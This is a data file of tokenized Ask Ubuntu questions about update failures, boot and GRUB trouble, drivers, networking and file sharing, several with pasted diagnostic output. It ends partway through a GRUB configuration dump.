269615	trouble in updating my xubuntu 12.04.02	when i try tp update my xubuntu in `` update manager '' i get this error : failed to download repository information when i try to update through terminal i get this : w : failed to fetch cdrom : //xubuntu 12.04 lts _precise pangolin_ - release i386 ( 20120423 ) /dists/precise/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //xubuntu 12.04 lts _precise pangolin_ - release i386 ( 20120423 ) /dists/precise/multiverse/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //xubuntu 12.04 lts _precise pangolin_ - release i386 ( 20120423 ) /dists/precise/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //xubuntu 12.04 lts _precise pangolin_ - release i386 ( 20120423 ) /dists/precise/universe/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms e : some index files failed to download . they have been ignored , or old ones used instead . what should i do ? it has n't been updated for 10 days .
269622	ubuntu insallation - > hp 1000 - i3-2370m	i have hp 1000 - i3-2370m notebook . i tried to install ubuntu 12.04 and 12.10 but non of them gets installed . i have some success with 13.04 beta version . actually when i try to boot from ubuntu , it starts but after few second screen become black and nothing happens . then i tried with external lcd then i was able to see ubuntu and it helped me to install ubuntu . once i installed both laptop lcd and external lcd show me desktop and i can work fine but when i remove external lcd and reboot notebook then again it stuck on black screen even ubuntu is installed and if again i add external lcd then i can work on ubuntu.. but this process only work with 13.04 beta . 12.04 or 12.10 . does not work in any way . i tested 64 bit ubuntu . if have window 7 and tried to install ubuntu then i download ubuntu but when it extract then it give some error and install does not install anything . please look into this laptop and try to add in upcoming ubuntu 13.04 . so i can use ubuntu . here is hp 1000 notebook specification : hp 1000 specifications : intel® core™ i3-2370m processor ( 2.4 ghz , 3mb l3 cache ) intel® hm75 express chipset intel® hd graphics 3000 14.0-inch diagonal hd bright view led-display ( 1366 x 768 ) 2gb ddr3 system memory hp 500gb 5400rpm hard disk drive hp supermulti dvd writer integrated 10/100base-t ethernet lan 802.11b/g/n wlan 3 usb 2.0 , hdmi , rj-45 , headphone out , microphone in hp 720p high definition webcam with integrated microphone altec lansing internal speakers 6-cell lithium-ion battery hp 65w ac adapter with power cable notebook keyboard with touchpad supporting multi-touch i will wait for positive feedback from ubuntu officials .
269630	i do n't remember my update manager password !	unlike what i read here , that a password is no longer needed for update manager , my ubuntu is asking me for a password and i do n't remember it ! i 'm in a mess here because without an update a lot of websites seem restricted such as the new version of hotmail , which i ca n't access on here . i 've tried all of the passwords i would normally do . what can i do to update ? i look forward to hear from you . regards , dan
269631	nvm command not found	i am trying to install node version manager and followed the installation instructions provided at its github page . installation got over but now i am getting an error as command not found : nvm when i try using nvm install 0.8 can someone please help me find out why i am gettting an error that nvm is not found when i have already installed it .
269637	in a `` save as ... `` dialog , what 's the quickest way to keyboard-navigate to `` recently used '' in the `` places '' side-pane of nautilus ?	with this and this in mind , what 's the quickest way to keyboard-navigate to `` recently used '' in the `` places '' side-pane in a ( nautilus ) `` save as ... `` dialog ? currently , the quickest ( ! ) way i know of is to shift tab a number of times , possibly taking a shortcut along the way by hitting f6 , which will save three of the many shift tab 's . clearly , this is neither quick nor efficient . any ideas ?
269638	12.04 running slow on my machine	hi i 'm very new to ubuntu 12.04 lts and having installed it on albeit an old laptop i have found it to be very slow . i have a feeling this is more likely to do with my hardware but i 'd appreciate any help that could be offered . my system runs ( fully up to date ) ubuntu 12.04 lts on 1.7gib ram , amd athlon ( tm ) processor 2650e , gallium 0.4 on ati rs690 , 64bit and has 80gb of disk space ( dual boot experiment ) . while i did n't expect it to be lightning fast i 'm still surprised how 'laggy ' my machine is running ( 32bit xp running on the same spec runs perfectly ) . my apologies if i 've made some elementary mistakes of this is a repeat question , would just love to get ubuntu to work for me . linux hanbuntu 3.2.0-39-generic # 62-ubuntu smp thu feb 28 00:28:53 utc 2013 x86_64 x86_64 x86_64 gnu/linux “/usr/lib/nux/unity_support_test -p” results in the following : opengl vendor string : x.org r300 project opengl renderer string : gallium 0.4 on ati rs690 opengl version string : 2.1 mesa 8.0.4 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes “sudo lshw -c video” reveals the following : *-display description : vga compatible controller product : rs690m [ radeon x1200 series ] vendor : hynix semiconductor ( hyundai electronics ) physical id : 5 bus info : pci @ 0000:01:05.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm msi vga_controller bus_master cap_list rom configuration : driver=radeon latency=64 resources : irq:43 memory : d0000000-dfffffff memory : f0100000-f010ffff ioport:9400 ( size=256 ) memory : f0000000-f00fffff “sudo hdparm -tt /dev/sda” provides the following : timing cached reads : 1474 mb in 2.00 seconds = 736.99 mb/sec timing buffered disk reads : 182 mb in 3.01 seconds = 60.47 mb/sec “sudo hdparm -v /dev/sda” provides : /dev/sda : multcount = 16 ( on ) io_support = 1 ( 32-bit ) readonly = 0 ( off ) readahead = 256 ( on ) geometry = 19457/255/63 , sectors = 312581808 , start = 0
269642	poor battery life with intel i7	i have an asus k55vd laptop ( intel i7-3610qm , intel hd-4000 ) , and have noticed poor battery life when using ubuntu : ~3hrs . this runtime is with the screen at minimum brightness , the processor scaled all the way down , pm-powersave set to `` true '' , and the wifi power-management on . does anyone here know how to decrease the power consumption ? i 've gotten the same battery life on 12.04 , 12.10 , and even raring pre-release . are there some sort of intel-specific power-management tools available ? thanks !
269643	how do i map users with a samba share ?	i have a synology diskstation with a published windows share . on both the server and the client ( ubuntu 12.04 ) i have user accounts with matching username and passwords . ( myth/myth ) the share is mounted with : //192.168.88.1/plex /mnt/plex cifs username=myth , password=xxxx 0 0 i can create , read and delete files on the share . i ca n't edit or overwrite them . they get created as : -rw-rw-r -- 1 1026 users 725178368 mar 18 13:12 the server ( synology diskstation , running dsm4.1 , their own flavour of linux ) has a user called myth . the client ( ubuntu 12.04 ) has a user called myth . both account have identical passwords . so , it seems somehow i need to map uid 1026 to the user myth ? how do i do that ? smb.conf from the diskstation : [ global ] printcap name=cups winbind enum groups=yes security=user local master=no realm=* passdb backend=smbpasswd printing=cups winbind enum users=yes load printers=yes workgroup=workgroup [ plex ] invalid users=nobody , nobody valid users=nobody , guest , admin , myth , nobody comment= '' storage location for plexmediaserver '' path=/volume1/plex guest ok=yes browseable=yes fileindex=yes mediaindex=no edit synoacl=no enable recycle bin=yes recycle bin admin only=no hide unreadable=no ftp disable list=no ftp disable modify=no ftp disable download=no read list=nobody , guest , nobody write list=nobody , admin , myth , nobody writeable=yes
269646	what happened when i installed graphic drivers ?	my laptop is dell inspiron n5420 . i have tried to install nvdia vga driver and intel graphic driver . but i ca n't see anything about my graphic card in `` computer details '' . i 'm newbie so i do n't know anything .
269647	disable startup scripts when loging in ?	in windows you press the shift key when you login to disable any startup scripts from running . is there an equivalent action in ubuntu ?
269655	install ubuntu on a partitioned system	i 'm trying to install ubuntu along with my existing windows 8 os ( the computer came with windows 7 so i 'm supposed to have the old bios ) . the problem is that when i tried installing ubuntu from a usb drive i did n't have the option to install it alongside windows , i 've been told that the problem is that i 've got 4 partitions and more partitions just ca n't be added . these are the partitions i have on my machine , i think i 'll try resizing the windows7_os partition in order to free some space and delete one of the others partitions . the question is which one can be removed safely . other solutions for running ubuntu will be appreciated as well : ) b.t.w i 'm using a u310 which is supposed to have 32gb ssd storage as well as 500gb hdd storage
269656	what if no update , security or otherwise is ever installed ?	i am in need of expert advice : our system admin who is new to ubuntu in particular and *nix in general is reluctant to install any updates . his view is what if after installing updates the system becomes unstable and does n't boot up ? he has some horror stories from past life as windows sys-admin . some in our team believe this is suicidal as not installing ( at least ) security updates is opening up to malicious attacks . it was suggested to run sudo unattended-upgrade so that at least security updates be installed , however even this sometimes requires system to be restarted . i really appreciate expert comments on this ? thanks .
269660	did i install python 3.3 in the right folder ?	i downloaded and installed it ( thanks mostly to these guys in the how-to section : how to install python 3.3 ? ) and the learning guide that i am using explains that placing the installation in the downloads folder might not be the best idea for windows users . is this the case for me using ubuntu ? if so , can i simply copy and paste it elsewhere ? where might be a good place ? thanks !
269661	black screen on boot nvidia optimus card	whenever i boot my screen comes up with a black screen with the same text as if i hit control alt f1 . my graphics card is an nvidia optimus card using bumblebee . it also sometimes comes up with `` this system is running in low graphics mode . '' sometimes it will boot , but it takes multiple hard reboots . this is the output of lspci : 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.2 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 3 ( rev b5 ) 00:1c.4 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 5 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation hm67 express chipset family lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 01:00.0 vga compatible controller : nvidia corporation gf108 [ geforce gt 540m ] ( rev ff )
269663	xfce , tty , blank screen , not working shortcuts	i 've got a strange problem with keyboard shortcuts . after turning on my computer ( or rebooting ) , and logging in , shortcuts do n't work . to get them working , i have to log out and log in again . then everything is all right . there 's another problem . i have access to tty-s 1-6 only just after reboot ( and logging in for the first time ) . when i log out ( to make xfce shortcuts working ) , i loose access to my tty-s . there 's a blank screen instead . i think that there might be a key conflict . but i do n't use any shortcut combination which uses ctrl+alt at the same time . i have a nvidia graphics card . i put a line : option `` handlespecialkeys '' `` always '' in the section `` serverlayout '' ( i tried before in serverflags ) in /etc/x11/xorg.conf but it did n't helped ( firstly i wanted to fix ttys , being unaware of desktop shortcuts problem ) an issue with blank screen on ctrl+alt+f1-f6 happens also after waking up from a suspend state . to get access to tty 1-6 after loosing it , i have to reboot my computer . thanks for any ideas .
269667	ubuntu on macbook mid 2009 network not working	i 've just finished my install of ubuntu , but have no drivers what so ever . when i try to hook it to the internet by cable it keeps disconnecting , and wireless is no option . how can i get my internet ( and everything else ) working properly ? thank you .
269670	completely removing a package	i have recently corrupted my gimp installation . when i try apt-get remove gimp it removes it . but when i try to reinstall it fresh from repository , it wo n't . it just installs it back from local package manager or repository . i want gimp completely get rid of , including all settings and configurations so my next install is all fresh like a first time install , so i hope my corrupt gimp starts working again . i 've even tried using apt-get purge gimp but did n't work . how is this possible ? thanks .
269674	boot directly from grub2	i 'm having some issues with the boot on my laptop . i have partitioned my hd , and installed windows 8 first and ubuntu 12.10 then , both for 64 bits versions . the problem is , when i boot , the boot loader is the one of microsoft , and i want it to go directly to the grub2 . i 've customized the grub2 and set it as the default , but it still boots from the microsoft boot loader . any help ? thank you .
269675	small sda2 partition between root and swap	i have been trying for a while to figure out the partition scheme on my desktop that was automatically installed by ubuntu when i installed . i let ubuntu create the partitions as it saw fit on my single disk system and i ended up with sda1 as i expected and sda5 as swap , but i also got a single block sda2 in between the swap and root . does anybody know why this would have been created ? the desktop is old and not efi . also bonus points for explaining why the swap partition is on sda5 and not just sequential as i would have expected .
269682	intermittent internet connection using wireless lan , acer aspire s3 , ubuntu 12.10	i have an acer aspire s3 running linux mint 14 / ubuntu 12.10 . the problem with my wireless is that it keeps disconnecting from the internet for about 1 minute at a time . it does this every 5-10 minutes . it is still connected to the router - i can ping my router , but i can not ping an outside server . i disabled dnsmasq by commenting out a line in /etc/networkmanager/networkmanager.conf and switched to google 's dns servers . this definitely made things better , but it makes me wonder if maybe doing that sovled an earlier dns problem and that now i have a different problem ? let me know if there is any more information i can give on the problem . cat /etc/resolvconf/resolv.conf.d/head nameserver 8.8.8.8 nameserver 8.8.4.4 iwconfig : lo no wireless extensions . wlan0 ieee 802.11abgn essid : '' skyc6b48 '' mode : managed frequency:2.412 ghz access point : 4c:17 : eb : ac:6b:49 bit rate=104 mb/s tx-power=16 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=65/70 signal level=-45 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:225 invalid misc:79 missed beacon:0 ifconfig : lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:4538 errors:0 dropped:0 overruns:0 frame:0 tx packets:4538 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:2112909 ( 2.1 mb ) tx bytes:2112909 ( 2.1 mb ) wlan0 link encap : ethernet hwaddr 84:4b : f5:74 : ee : bf inet addr:192.168.0.2 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :864b : f5ff : fe74 : eebf/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2383573 errors:0 dropped:0 overruns:0 frame:0 tx packets:1407209 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2845276498 ( 2.8 gb ) tx bytes:234741693 ( 234.7 mb ) sudo lshw -class network : *-network description : wireless interface product : ar9462 wireless network adapter vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 84:4b : f5:74 : ee : bf width : 64 bits clock : 33 mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.5.0-17-generic firmware=n/a ip=192.168.0.2 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn resources : irq:19 memory : c0400000-c047ffff memory : aff00000-aff0ffff
269684	how do i change the priority of a process/program	i would like to be able to change the priority of the supertuxkart process to a higher one so that it will run with less lag . it is quite easy to do on windows ( you just need the administrator password/account ) but it 's basically impossible in ubuntu . i tried gksu gnome-system-monitor and sudo gnome-system-monitor but both gave me processes for the root account , not mine ( an administrator account ) . any help i can get is appreciated !
269687	what can i use to transcode mkv to mkv with good automatic compression ?	i have a large dvd collection which i wish to convert to mkv with h264 and audio passthrough ( unless there 's something much better that the untranscoded ac3 or dts ) with subtitles . so far i have found makemkv which very handily rips dvds , including multi-episode dvds , to a set of mkvs in a folder , containing the original mpeg2 and ac3/dts streams with subtitles . it 's missing all the optional audio and chapter information though . what i 'm looking for is a tool to transcode those mkvs to mkvs , but re-compressing the video to h264 at an equivalent quality . also i would like it to automatically chop black bars off if detected . so , ultimately i 'm looking for a method to : rip the titles off a dvd , ignoring short titles include all the audio and subtitle tracks automatically detect and crop black bars re-compress mpeg video to h264 store it all in an mkv container set default audio and subtitle tracks subsequently fill in the meta-data , title , etc . does anything like that exists ?
269693	why does ubuntu always boot regardless of boot priority ?	i am running ubuntu 12.10 . i thought i had installed 64-bit but somehow i had installed 32-bit . i wanted to install 64-bit ubuntu over the current installation with my flash drive but whenever i select my flash drive to boot , it boot into ubuntu anyway . my computer teacher gave me an ubuntu 8.10 desktop edition dvd . could i possibly boot from it and delete the partition so i can do a clean installation ? i looked this up for quite some time and i have n't found any answers .
269694	how to download entire shared folder on ubuntu one	is it possible to download entire folder with all files in it the easy way from someone else 's ubuntu one account ( if that folder is shared for me ) ?
269695	how to install libtorrent-rasterbar 0.14.10 on ubuntu 12.04	i would like to install libtorrent-rasterbar 0.14.10 on ubuntu 12.04 . this has been suggested to me as a solution to problems using deluge behind a vpn . i have tried adding an older deluge ppa but that produced broken packages . i also tried installing the from source , but got the following error in terminal : configure : error : we could not detect the boost libraries ( version 1.34 or higher ) . if you have a staged boost library ( still not installed ) please specify $ boost_root in your environment and do not give a path to -- with-boost option . if you are sure you have boost installed , then check your version number looking in < boost/version.hpp > . see http : //randspringer.de/boost for more documentation . this my first question here , so please go easy and thanks in advance for any tips .
269696	ca n't uninstall apps that are being used on wine	i recently installed wine so that i could play midtown madness 2 on it but when i installed midtown madness and ran it , it crashed so now i want to uninstall it but i ca n't is there a way i can get rid of midtown madness ? i am running ububtu 12.04 .
269697	unable to install latest version of codeblocks	i am presently using kubuntu , and now i want to install codeblocks latest version . i tried using $ sudo apt-get install codeblocks but , it gives me codeblocks 10.05 . i do n't know where is the problem . earlier i was able to install codeblocks 12.11 in ubuntu , why such problem in kubuntu then ?
269698	why does ubuntu menu behave like osx ?	one of the annoyances of osx was that the menu bar is locates in the top task bar and not on the window of the application you are running . its like playing ping pong having to move your cursor to the top of the screen instead of the window you are using . is there a way to make the menu return to the application where it is supposed to be instead of the top where the task bar is ?
269704	can i write a python script that will automatically load a terminal as sudo ?	i use sudo a lot and i am constantly having to restart my terminal ( development of programs that froze usually ) and it 's a pain in the butt to constantly put in the sudo command and then my password . is there a way i could through python ( or a script file ) get an already sudo terminal ? i was n't sure if i should post it on stack overflow ( because of the coding side ) or here ( because of sudo/terminal stuff ) .
269707	using apt-get install in a live environment	i would like to know where does data stores when i use apt-get install in a live environment ( 2gb usb ) . does this write data on the hdd ? thanks .
269712	ca n't boot ubuntu after installing mint	just installed mint and ubuntu wo n't boot . it hangs after `` checking battery '' ; also , i can drop to shell with alt+f2 and access the system from the command line . what might be the problem ?
269716	how to disable a specific mount , when using automount over ldap	i am using ubuntu 11.04 , on which nfs paths are automounted using autofs/ldap . for example , /path1 and /path2 are auto mounted , but i want to disable automount for /path1 , because i want to use a local folder instead , so i added this to /etc/auto.master : /path1 -null but it does n't seem to have any effect . so what is the proper way of overriding/disabling such specific mounts on client side for a automount map loaded via ldap ? i do n't have control over the ldap server , and it automounts 10 or so paths out of which i want one disabled . edit : when i run mount command i see something like this home.xxx.com : /home1 on /mnt/home1 type nfs git.xxx.com : /git on /mnt/git type nfs i thought /mnt/home1 and /mnt/git are loaded separately from ldap , but automount -m shows only one entry mount point : /mnt source ( s ) : type : ldap map : ldap : ou=auto.mnt , ou=automount , dc=xxx , dc=com that said would n't /mnt/git -null ' in/etc/auto.master` work , or i will have to make whole /mnt null ?
269718	unable to bind to port 80 [ bitnami , osqa , ubuntu 12.04 ]	for some reason i ca n't open port 80 , so my install is using 8080. how can i find the exact service using port 80 and terminate it or uninstall it ?
269720	ca n't start windows after installing ubuntu	first i 've installed windows 7 and then linux mint on another hard-drive . so when i started the pc i saw the grub-menu with the possibilities to start mint or win7 . then i wanted to install ubuntu too . so i installed ubuntu on the same hard-drive as windows . and here is the problem : the grub-menu was the same . i could choose between windows and mint . but when i took windows , there was a secound grub-menu , where i could choose between ubuntu and windows . and when i took windows again , i got the error message error : no such partition i thought that it would help and deleted ubuntu ( with gparted on mint ) again . but the error message , when i choose windows in the grub-menu is still the same ... : ( the terminal command sudo grub-update did n't change anything . the output of sudo fdisk -l is : disk /dev/sda : 512.1 gb , 512110190592 bytes 255 köpfe , 63 sektoren/spur , 62260 zylinder , zusammen 1000215216 sektoren einheiten = sektoren von 1 × 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes festplattenidentifikation : 0x690c52e8 gerät boot . beginn ende blöcke id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 205006847 102400000 7 hpfs/ntfs/exfat /dev/sda3 205008896 790946395 292968750 7 hpfs/ntfs/exfat disk /dev/sdb : 500.1 gb , 500107862016 bytes 255 köpfe , 63 sektoren/spur , 60801 zylinder , zusammen 976773168 sektoren einheiten = sektoren von 1 × 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes festplattenidentifikation : 0x0003444c gerät boot . anfang ende blöcke id system /dev/sdb1 2048 960227327 480112640 83 linux /dev/sdb2 960229374 976771071 8270849 5 erweiterte /dev/sdb5 960229376 976771071 8270848 82 linux swap / solaris platte /dev/mapper/cryptswap1 : 8469 mbyte , 8469348352 byte 255 köpfe , 63 sektoren/spur , 1029 zylinder , zusammen 16541696 sektoren einheiten = sektoren von 1 × 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes festplattenidentifikation : 0x1ef333a1 festplatte /dev/mapper/cryptswap1 enthält keine gültige partitionstabelle ( sorry about the german words in the output ^^ ) and here is the result of the boot info script : ============================= boot info summary : =============================== = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks in partition 72 for . = > grub2 ( v1.99 ) is installed in the mbr of /dev/sdb and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks in partition 72 for . sda1 : __________________________________________________________________________ file system : ntfs boot sector type : grub2 ( v1.99 ) boot sector info : grub2 ( v1.99 ) is installed in the boot sector of sda1 and looks at sector 947843184 of the same hard drive for core.img . core.img is at this location and looks for ( , msdos6 ) /boot/grub on this drive . no errors found in the boot parameter block . operating system : boot files : /bootmgr /boot/bcd sda2 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows 7 boot files : /windows/system32/winload.exe sda3 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : sdb1 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : linux mint 14 nadia boot files : /boot/grub/grub.cfg /etc/fstab sdb2 : __________________________________________________________________________ file system : extended partition boot sector type : unknown boot sector info : sdb5 : __________________________________________________________________________ file system : boot sector type : - boot sector info : mounting failed : mount : unbekannter dateisystemtyp „“ ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 512.1 gb , 512110190592 bytes 255 köpfe , 63 sektoren/spur , 62260 zylinder , zusammen 1000215216 sektoren einheiten = sektoren von 1 × 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 * 2,048 206,847 204,800 7 ntfs / exfat / hpfs /dev/sda2 206,848 205,006,847 204,800,000 7 ntfs / exfat / hpfs /dev/sda3 205,008,896 790,946,395 585,937,500 7 ntfs / exfat / hpfs drive : sdb _____________________________________________________________________ disk /dev/sdb : 500.1 gb , 500107862016 bytes 255 köpfe , 63 sektoren/spur , 60801 zylinder , zusammen 976773168 sektoren einheiten = sektoren von 1 × 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdb1 2,048 960,227,327 960,225,280 83 linux /dev/sdb2 960,229,374 976,771,071 16,541,698 5 extended /dev/sdb5 960,229,376 976,771,071 16,541,696 82 linux swap / solaris '' blkid '' output : ________________________________________________________________ device uuid type label /dev/mapper/cryptswap1 d46698fc-ca0b-4747-af9a-0bcf8f9a65c1 swap /dev/sda1 ecdcac21dcabe3d4 ntfs system-reserviert /dev/sda2 ac903ecb903e9bb0 ntfs system /dev/sda3 8e025e4d025e3a83 ntfs daten /dev/sdb1 b6b5fc35-3afb-4a94-b3b8-9b618a83493a ext4 ========================= `` ls -r /dev/mapper/ '' output : ========================= /dev/mapper : control cryptswap1 ================================ mount points : ================================= device mount_point type options /dev/sdb1 / ext4 ( rw , errors=remount-ro ) =========================== sdb1/boot/grub/grub.cfg : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ x '' $ { feature_menuentry_id } '' = xy ] ; then menuentry_id_option= '' -- id '' else menuentry_id_option= '' '' fi export menuentry_id_option if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { if [ x $ feature_all_video_module = xy ] ; then insmod all_video else insmod efi_gop insmod efi_uga insmod ieee1275_fb insmod vbe insmod vga insmod video_bochs insmod video_cirrus fi } if [ x $ feature_default_font_path = xy ] ; then font=unicode else insmod part_msdos insmod ext2 set root='hd1 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd1 , msdos1 -- hint-efi=hd1 , msdos1 -- hint-baremetal=ahci1 , msdos1 b6b5fc35-3afb-4a94-b3b8-9b618a83493a else search -- no-floppy -- fs-uuid -- set=root b6b5fc35-3afb-4a94-b3b8-9b618a83493a fi font= '' /usr/share/grub/unicode.pf2 '' fi if loadfont $ font ; then set gfxmode=auto load_video insmod gfxterm set locale_dir= $ prefix/locale set lang=de_de insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/06_mint_theme # # # set menu_color_normal=white/black set menu_color_highlight=white/light-gray # # # end /etc/grub.d/06_mint_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ 1 '' if [ `` $ 1 '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ $ { recordfail } ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ linux_gfx_mode '' ! = `` text '' ] ; then load_video ; fi menuentry 'linux mint 14 cinnamon 64-bit , 3.5.0-17-generic ( /dev/sdb1 ) ' -- class linuxmint -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd1 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd1 , msdos1 -- hint-efi=hd1 , msdos1 -- hint-baremetal=ahci1 , msdos1 b6b5fc35-3afb-4a94-b3b8-9b618a83493a else search -- no-floppy -- fs-uuid -- set=root b6b5fc35-3afb-4a94-b3b8-9b618a83493a fi linux /boot/vmlinuz-3.5.0-17-generic root=uuid=b6b5fc35-3afb-4a94-b3b8-9b618a83493a ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.5.0-17-generic } menuentry 'linux mint 14 cinnamon 64-bit , 3.5.0-17-generic ( /dev/sdb1 ) -- recovery mode ' -- class linuxmint -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root='hd1 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd1 , msdos1 -- hint-efi=hd1 , msdos1 -- hint-baremetal=ahci1 , msdos1 b6b5fc35-3afb-4a94-b3b8-9b618a83493a else search -- no-floppy -- fs-uuid -- set=root b6b5fc35-3afb-4a94-b3b8-9b618a83493a fi echo 'linux 3.5.0-17-generic wird geladen …' linux /boot/vmlinuz-3.5.0-17-generic root=uuid=b6b5fc35-3afb-4a94-b3b8-9b618a83493a ro recovery nomodeset echo 'initiale ramdisk wird geladen …' initrd /boot/initrd.img-3.5.0-17-generic } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/10_lupin # # # # # # end /etc/grub.d/10_lupin # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root='hd1 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd1 , msdos1 -- hint-efi=hd1 , msdos1 -- hint-baremetal=ahci1 , msdos1 b6b5fc35-3afb-4a94-b3b8-9b618a83493a else search -- no-floppy -- fs-uuid -- set=root b6b5fc35-3afb-4a94-b3b8-9b618a83493a fi linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root='hd1 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd1 , msdos1 -- hint-efi=hd1 , msdos1 -- hint-baremetal=ahci1 , msdos1 b6b5fc35-3afb-4a94-b3b8-9b618a83493a else search -- no-floppy -- fs-uuid -- set=root b6b5fc35-3afb-4a94-b3b8-9b618a83493a fi linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry 'windows 7 ( loader ) ( auf /dev/sda1 ) ' -- class windows -- class os $ menuentry_id_option 'osprober-chain-ecdcac21dcabe3d4 ' { insmod part_msdos insmod ntfs set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 ecdcac21dcabe3d4 else search -- no-floppy -- fs-uuid -- set=root ecdcac21dcabe3d4 fi chainloader +1 } # # # end 